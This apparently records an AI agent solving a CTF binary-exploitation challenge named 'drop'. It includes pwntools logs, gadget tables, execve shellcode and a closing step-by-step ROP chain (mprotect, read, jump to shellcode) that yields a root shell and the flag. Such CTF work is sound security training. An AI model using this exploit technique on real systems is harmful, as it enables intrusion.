# Thread Handoff

- Thread: quiet-lantern-8197
- UUID: 76f184dd-bd2c-4b5d-a06f-45b9225328c1
- CTF: midnight-sun-ctf-2026-quals
- Challenge: drop
- Runtime: codex
- Model: gpt-5.5
- Status: completed

## Transcript

- **Assistant:** I’ll inspect `/challenge` first to identify the challenge type, then I’ll exercise the remote service locally or over `nc` depending on what files are provided. I’ll send short progress notes to the webhook, but I’ll avoid posting the final flag there unless you explicitly want that.
- **Assistant:** The challenge is a single executable. The webhook post failed due to sandbox DNS restrictions, so I’ll request network escalation for those status posts as needed while continuing local reversing.
- **Assistant:**

  ```text
  [*] '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
      Arch:       amd64-64-little
      RELRO:      Full RELRO
      Stack:      Canary found
      NX:         NX enabled
      PIE:        PIE enabled
      SHSTK:      Enabled
      IBT:        Enabled
  ```

- **Assistant:** Initial triage points to a 64-bit PIE binary with full RELRO, canary, NX, and CET enabled. Imports include `mmap`, `mprotect`, `getrandom`, `rand`, and `read`, so I’m checking whether it builds or transforms executable memory at runtime.
- **Assistant:** The pivot makes the second mapping useful even though its address is hidden: after the first `ret`, `rsp` points directly into our controlled bytes. I’m looking for a predictable `jmp rsp`/`call rsp` gadget in the 8 MB rand-filled page, then the rest can be normal shellcode.
- **Assistant:**

  ```text
  seed 1778418915 hits [('jmp rsp', '0xc0dbcfc', 36092), ('call rsp', '0xc138250', 414288), ('push rsp; ret', '0xc0df0d3', 49363), ('syscall; ret', '0xc283f07', 1773319)]
  ```

- **Assistant:**

  ```text
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5
  [DEBUG] Received 0x711 bytes:
  [DEBUG] Received 0x14 bytes:
      b'mem: 0xc0d3000\n'
      b' : '
  b'38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nmem: 0xc0d3000\n : '
  candidates [1778418935, 1778418940, 1778418945, 1778418950]
  seed 1778418935 jmp 0xc0db885
  seed 1778418940 jmp 0xc0d54e0
  seed 1778418945 jmp 0xc0f9f21
  seed 1778418950 jmp 0xc0de43d
  using 0xc0f9f21
  [DEBUG] cpp -Wno-unused-command-line-argument -C -nostdinc -undef -P -I/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/data/includes
  [DEBUG] Assembling
      .section .shellcode,"awx"
      .global _start
      .global __start
      _start:
      __start:
      .intel_syntax noprefix
      .p2align 0
          /* execve(path='/bin///sh', argv=['sh'], envp=0) */
          /* push b'/bin///sh\x00' */
          push 0x68
          push 0x732f2f2f
          push 0x6e69622f
          mov ebx, esp
          /* push argument array ['sh\x00'] */
          /* push 'sh\x00\x00' */
          push 0x1010101
          xor dword ptr [esp], 0x1016972
          xor ecx, ecx
          push ecx /* null terminate */
          push 4
          pop ecx
          add ecx, esp
          push ecx /* 'sh\x00' */
          mov ecx, esp
          xor edx, edx
          /* call execve() */
          push 11 /* 0xb */
          pop eax
          int 0x80
  Traceback (most recent call last):
    File "", line 36, in
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/context/__init__.py", line 1716, in setter
      return function(*a, **kw)
             ^^^^^^^^^^^^^^^^^^
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 827, in asm
      tmpdir = tempfile.mkdtemp(prefix = 'pwn-asm-')
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 373, in mkdtemp
      prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 126, in _sanitize_params
      dir = gettempdir()
            ^^^^^^^^^^^^
    File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 315, in gettempdir
      return _os.fsdecode(_gettempdir())
                          ^^^^^^^^^^^^^
    File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 308, in _gettempdir
      tempdir = _get_default_tempdir()
                ^^^^^^^^^^^^^^^^^^^^^^
    File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 223, in _get_default_tempdir
      raise FileNotFoundError(_errno.ENOENT,
  FileNotFoundError: [Errno 2] No usable temporary directory found in ['/tmp', '/var/tmp', '/usr/tmp', '/workspace']
  [*] Stopped process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' (pid 5)
  ```

- **Assistant:**

  ```text
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5
  attempt 0 time 1778418959 seed 1778418955 addr 0xc0f449c
  [x] Receiving all data
  [x] Receiving all data: 0B
  [+] Receiving all data: Done (0B)
  [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 5)
  b''
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 6
  attempt 1 time 1778418960 seed 1778418960 addr 0xc0d6ea0
  [x] Receiving all data
  [x] Receiving all data: 0B
  [+] Receiving all data: Done (0B)
  [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 6)
  b''
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 7
  attempt 2 time 1778418961 seed 1778418960 addr 0xc0d6ea0
  [x] Receiving all data
  [x] Receiving all data: 0B
  [+] Receiving all data: Done (0B)
  [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 7)
  b''
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 8
  attempt 3 time 1778418962 seed 1778418960 addr 0xc0d6ea0
  [x] Receiving all data
  [x] Receiving all data: 0B
  [+] Receiving all data: Done (0B)
  [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 8)
  b''
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 9
  attempt 4 time 1778418963 seed 1778418960 addr 0xc0d6ea0
  [x] Receiving all data
  [x] Receiving all data: 0B
  [+] Receiving all data: Done (0B)
  [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 9)
  b''
  ```

- **Assistant:** The direct `jmp rsp` test crashes because the controlled page is only RW, not executable. I’m switching to a short ROP chain from the predictable page: `mprotect` the fixed rand page to RWX, `read` shellcode into that known address, then return there.
- **Assistant:**

  ```text
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5
  attempt 0 seed 1778418990
  None
  Traceback (most recent call last):
    File "", line 30, in
  TypeError: 'NoneType' object is not subscriptable
  [*] Stopped process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' (pid 5)
  ```

- **Assistant:**

  ```text
  1778419010 {'pop_rax': '0xc0eb6df', 'pop_rdi': '0xc0d3ac4', 'pop_rsi': '0xc0f80ec', 'pop_rdx': '0xc0e4793', 'syscall_ret': None, 'int80_ret': '0xc3352fc'}
  1778419015 {'pop_rax': '0xc0dae27', 'pop_rdi': '0xc0ef854', 'pop_rsi': '0xc0db683', 'pop_rdx': '0xc0e9577', 'syscall_ret': '0xc7c93db', 'int80_ret': None}
  1778419020 {'pop_rax': '0xc0d52f5', 'pop_rdi': '0xc0f8d73', 'pop_rsi': '0xc0d9709', 'pop_rdx': '0xc0d4b1f', 'syscall_ret': '0xc5df1b6', 'int80_ret': '0xc6b6474'}
  1778419025 {'pop_rax': '0xc0e155c', 'pop_rdi': '0xc0e4f8f', 'pop_rsi': '0xc0e8657', 'pop_rdx': '0xc0e0a05', 'syscall_ret': None, 'int80_ret': None}
  1778419030 {'pop_rax': '0xc0f9020', 'pop_rdi': '0xc0da25c', 'pop_rsi': '0xc0e2d83', 'pop_rdx': '0xc0eee6d', 'syscall_ret': None, 'int80_ret': None}
  1778419035 {'pop_rax': '0xc0d6305', 'pop_rdi': '0xc0dc61f', 'pop_rsi': '0xc0d3e27', 'pop_rdx': '0xc0de0df', 'syscall_ret': None, 'int80_ret': None}
  1778419040 {'pop_rax': '0xc0d612b', 'pop_rdi': '0xc0e1c07', 'pop_rsi': '0xc0edd64', 'pop_rdx': '0xc0d86fd', 'syscall_ret': None, 'int80_ret': None}
  1778419045 {'pop_rax': '0xc0d8cf7', 'pop_rdi': '0xc0e1685', 'pop_rsi': '0xc12a5f7', 'pop_rdx': '0xc0ea89d', 'syscall_ret': '0xc720d70', 'int80_ret': None}
  1778419050 {'pop_rax': '0xc0e3e61', 'pop_rdi': '0xc0dcc30', 'pop_rsi': '0xc0e3530', 'pop_rdx': '0xc0fa989', 'syscall_ret': '0xc7fe4a0', 'int80_ret': None}
  1778419055 {'pop_rax': '0xc0de6fc', 'pop_rdi': '0xc0ea84b', 'pop_rsi': '0xc0dcd41', 'pop_rdx': '0xc0ea4d0', 'syscall_ret': None, 'int80_ret': None}
  1778419060 {'pop_rax': '0xc0d92a9', 'pop_rdi': '0xc0f7459', 'pop_rsi': '0xc0e017f', 'pop_rdx': '0xc0dd89b', 'syscall_ret': '0xc8bf36c', 'int80_ret': None}
  1778419065 {'pop_rax': '0xc0e6bd8', 'pop_rdi': '0xc0dc6d3', 'pop_rsi': '0xc0d629c', 'pop_rdx': '0xc0ed83f', 'syscall_ret': None, 'int80_ret': None}
  1778419070 {'pop_rax': '0xc0ecb18', 'pop_rdi': '0xc0dc5c0', 'pop_rsi': '0xc0edcb3', 'pop_rdx': '0xc0e4f73', 'syscall_ret': None, 'int80_ret': None}
  1778419075 {'pop_rax': '0xc10802f', 'pop_rdi': '0xc0db1b7', 'pop_rsi': '0xc0d860f', 'pop_rdx': '0xc0f2dc7', 'syscall_ret': '0xc1f8530', 'int80_ret': None}
  1778419080 {'pop_rax': '0xc0e5787', 'pop_rdi': '0xc0db07d', 'pop_rsi': '0xc0e3a53', 'pop_rdx': '0xc0eb6bb', 'syscall_ret': '0xc263c1e', 'int80_ret': None}
  1778419085 {'pop_rax': '0xc0f07c7', 'pop_rdi': '0xc0d7e17', 'pop_rsi': '0xc0f46d3', 'pop_rdx': '0xc0fe2ed', 'syscall_ret': '0xc21e824', 'int80_ret': '0xc18279c'}
  1778419090 {'pop_rax': '0xc0d84b3', 'pop_rdi': '0xc0ede19', 'pop_rsi': '0xc0d3265', 'pop_rdx': '0xc0d4794', 'syscall_ret': None, 'int80_ret': None}
  1778419095 {'pop_rax': '0xc0d7360', 'pop_rdi': '0xc0e5047', 'pop_rsi': '0xc0fd1ab', 'pop_rdx': '0xc0d325c', 'syscall_ret': '0xc2c81be', 'int80_ret': None}
  1778419100 {'pop_rax': '0xc0dd69b', 'pop_rdi': '0xc0e4413', 'pop_rsi': '0xc0eb1a9', 'pop_rdx': '0xc0de770', 'syscall_ret': None, 'int80_ret': None}
  1778419105 {'pop_rax': '0xc11bb79', 'pop_rdi': '0xc0d6dc1', 'pop_rsi': '0xc0d69a3', 'pop_rdx': '0xc0d33ff', 'syscall_ret': '0xc178283', 'int80_ret': None}
  ```

- **Assistant:**

  ```text
  now 1778419034 seed 1778419030 ok False
  now 1778419036 seed 1778419035 ok False
  now 1778419037 seed 1778419035 ok False
  now 1778419038 seed 1778419035 ok False
  now 1778419039 seed 1778419035 ok False
  now 1778419040 seed 1778419040 ok False
  now 1778419042 seed 1778419040 ok False
  now 1778419043 seed 1778419040 ok False
  now 1778419044 seed 1778419040 ok False
  now 1778419045 seed 1778419045 ok True
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5
  len 76 {'pop_rax': 202214647, 'pop_rdi': 202249861, 'pop_rsi': 202548727, 'pop_rdx': 202287261, 'syscall_ret': 208801136}
  [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 5)
  Traceback (most recent call last):
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/tubes/process.py", line 757, in send_raw
      self.proc.stdin.flush()
  BrokenPipeError: [Errno 32] Broken pipe

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
    File "", line 35, in
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/tubes/tube.py", line 887, in send
      self.send_raw(data)
    File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/tubes/process.py", line 759, in send_raw
      raise EOFError
  EOFError
  ```

- **Assistant:**

  ```text
  Traceback (most recent call last):
    File "", line 8, in
  FileNotFoundError: [Errno 2] No such file or directory: '/proc/5/mem'
  ```

- **Assistant:**

  ```text
  pid attr 5 proc pid 5 poll None
  proc has False False
  procs sample ['/proc/1', '/proc/7', '/proc/19', '/proc/309', '/proc/314', '/proc/315', '/proc/316', '/proc/318']
  poll2 None
  ```

- **Assistant:**

  ```text
  now 1778419092 seed 1778419090 ok False
  now 1778419093 seed 1778419090 ok False
  now 1778419094 seed 1778419090 ok False
  now 1778419095 seed 1778419095 ok True
  [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989'
  [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5
  len 152 {'pop_rax': 202208096, 'pop_rdi': 202264647, 'pop_rsi': 202363307, 'pop_rdx': 202191452, 'syscall_ret': 204243390}
  [x] Receiving all data
  [x] Receiving all data: 0B
  [x] Receiving all data: 6B
  [x] Receiving all data: 45B
  [+] Receiving all data: Done (45B)
  [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code 0 (pid 5)
  b'PWNED\nuid=0(root) gid=0(root) groups=0(root)\n'
  ```

- **Assistant:** Local exploitation now works: the ROP chain needed 64-bit packing, then it successfully got a shell. I’m applying the same method to the remote service, with retries around the 5-second seed window in case the server clock is a little offset.
- **Assistant:**

  ```text
  --- attempt seed 1778419145 ---
  /home/ctf/run.sh: line 2:  2690 Illegal instruction     (core dumped) ./drop
  round 3 now 1778419143 usable seeds [1778419145]
  --- attempt seed 1778419145 ---
  /home/ctf/run.sh: line 2:  2764 Illegal instruction     (core dumped) ./drop
  round 4 now 1778419148 usable seeds [1778419145]
  ```

- **Assistant:**

  ```text
  --- attempt seed 1778419145 ---
  __START__
  midnight{r4nd0m_1s_4s_r4nD0m_d03s}
  midnight{r4nd0m_1s_4s_r4nD0m_d03s}
  __END__
  ```

- **Assistant:** Solved. Flag:

  ```text
  midnight{r4nd0m_1s_4s_r4nD0m_d03s}
  ```

  The binary seeds `libc` `rand()` with `time()` rounded down to a 5-second boundary, then fills a fixed RX mapping at `0xc0d3000` with 8 MB of predictable random bytes. It later reads our input into a random RW page, pivots `rsp` there, and executes `ret`. Because the controlled page is not executable, the exploit uses predictable gadgets from the rand-filled page:

  1. Find `pop rax/rdi/rsi/rdx; ret` and `syscall; ret` gadgets for the current 5-second seed.
  2. ROP `mprotect(0xc0d3000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC)`.
  3. ROP `read(0, 0xc0d3000, shellcode_len)`.
  4. Return to `0xc0d3000`.
  5. Send `/bin/sh` shellcode and run `cat flag* /flag /home/*/flag*`.

  The only timing issue was matching the remote’s 5-second seed window; retrying until a seed had the needed gadgets produced the shell and flag.

- **System:** Thread completed